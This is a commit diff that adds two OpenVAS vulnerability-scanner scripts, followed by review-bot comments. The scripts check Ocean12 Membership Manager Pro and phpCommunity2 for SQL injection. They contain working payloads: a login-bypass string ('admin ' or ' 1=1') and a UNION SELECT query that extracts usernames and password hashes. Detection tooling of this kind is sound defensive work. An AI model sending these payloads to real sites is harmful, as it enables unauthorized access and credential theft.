+# Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100037);
+ script_bugtraq_id(32508);
+ script_version ("1.0");
+
+ script_name(english:"Ocean12 Membership Manager Pro 'login.asp' SQL Injection Vulnerability");
+ desc["english"] = "
+
+ Overview:
+ Ocean12 Membership Manager Pro is prone to an SQL-injection
+ vulnerability because it fails to sufficiently sanitize
+ user-supplied data.
+
+ A successful exploit may allow an attacker to compromise the
+ application, access or modify data, or exploit latent
+ vulnerabilities in the underlying database.
+
+ Risk factor : Medium";
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Determine if Ocean12 Membership Manager Pro is vulnerable to SQL Injection");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+if(!can_host_asp(port:port))exit(0);
+
+dirs = make_list(cgi_dirs());
+
+foreach dir (dirs) {
+
+ url = string(dir, "/default.asp");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
+ if( buf == NULL )continue;
+
+ if(
+ egrep(pattern: "<title>Ocean12 Membership Manager Pro</title>", string: buf) &&
+ egrep(pattern: '<form method="post" action="login.asp">', string: buf)) {
+
+ variables = string("Username=admin ' or ' 1=1&Password=x");
+ filename = string(dir + "/login.asp");
+ host=get_host_name();
+
+ req = string(
+ "POST ", filename, " HTTP/1.0\r\n",
+ "Referer: ","http://", host, filename, "\r\n",
+ "Host: ", host, ":", port, "\r\n",
+ "Content-Type: application/x-www-form-urlencoded\r\n",
+ "Content-Length: ", strlen(variables),
+ "\r\n\r\n",
+ variables
+ );
+
+ result = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+
+ if(egrep(pattern: "Location: main.asp", string: result)) {
+ security_warning(port);
+ exit(0);
+ }
+ }
+}
+
+exit(0);
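Review bot: The description block has no `See also:` reference although `script_bugtraq_id(32508)` is set and every other advisory script in this commit links the matching securityfocus entry; adding the reference keeps the reports uniform. `filename = string(dir + "/login.asp");` mixes `+` inside `string()` as in the ProQuiz script; `string(dir, "/login.asp")` is the form used on the line before it. The `dirs = make_list(cgi_dirs());` wrapper adds nothing over `cgi_dirs()` itself and differs from the siblings, which seed the list with a product-specific directory.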
Added: trunk/openvas-plugins/scripts/phpCommunity2_multiple_remote_input_validation.nasl
===================================================================
--- trunk/openvas-plugins/scripts/phpCommunity2_multiple_remote_input_validation.nasl 2009-03-12 19:21:48 UTC (rev 2753)
+++ trunk/openvas-plugins/scripts/phpCommunity2_multiple_remote_input_validation.nasl 2009-03-13 05:42:27 UTC (rev 2754)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: phpCommunity2_multiple_remote_input_validation.nasl 119 2009-03-10 19:43:38Z mime $
+#
+# phpCommunity2 Multiple Remote Input Validation Vulnerabilities
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100041);
+ script_bugtraq_id(34056);
+ script_version ("1.0");
+
+ script_name(english:"phpCommunity2 Multiple Remote Input Validation Vulnerabilities");
+ desc["english"] = "
+
+ Overview:
+ phpCommunity2 is prone to multiple input-validation vulnerabilities,
+ including multiple directory-traversal issues and SQL-injection issues,
+ and a cross-site scripting issue.
+
+ Exploiting these issues could allow an attacker to view arbitrary
+ local files within the context of the webserver, steal cookie-based
+ authentication credentials, compromise the application, access or
+ modify data, or exploit latent vulnerabilities in the underlying
+ database.
+
+ See also:
+ http://www.securityfocus.com/bid/34056/
+
+ Risk factor : Medium";
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Determine if phpCommunity2 is vulnerable to Multiple Remote Input Validation Vulnerabilities");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port)) exit(0);
+
+dir = make_list("/phpcom", cgi_dirs());
+
+foreach d (dir)
+{
+ url = string(d, "/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25%22%20UNION%20ALL%20SELECT%201,2,3,4,CONCAT(nick,%200x3a,%20pwd),6%20FROM%20com_users%23");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
+ if( buf == NULL )exit(0);
+
+ if ( buf =~ "admin:[a-f0-9]{32}" )
+ {
+ security_warning(port:port);
+ exit(0);
+ }
+}
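Review bot: `if( buf == NULL )exit(0);` aborts the whole script on the first directory that returns nothing, whereas every sibling script uses `if( buf == NULL )continue;` to move on to the next `cgi_dirs()` entry; this should be `continue` as well. The injected query selects `CONCAT(nick, 0x3a, pwd)` from `com_users` and matches `admin:[a-f0-9]{32}`, so the check retrieves real credential hashes into the scanner and depends on an account literally named `admin` with a 32-hex-digit hash; selecting a fixed marker string, as PHPFusion and PHPRecipeBook do with `OpenVAS-SQL-Injection-Test`, proves the injection without handling password material and without that account assumption. The script also lacks the trailing `exit(0);` the other scripts end with; harmless, but inconsistent.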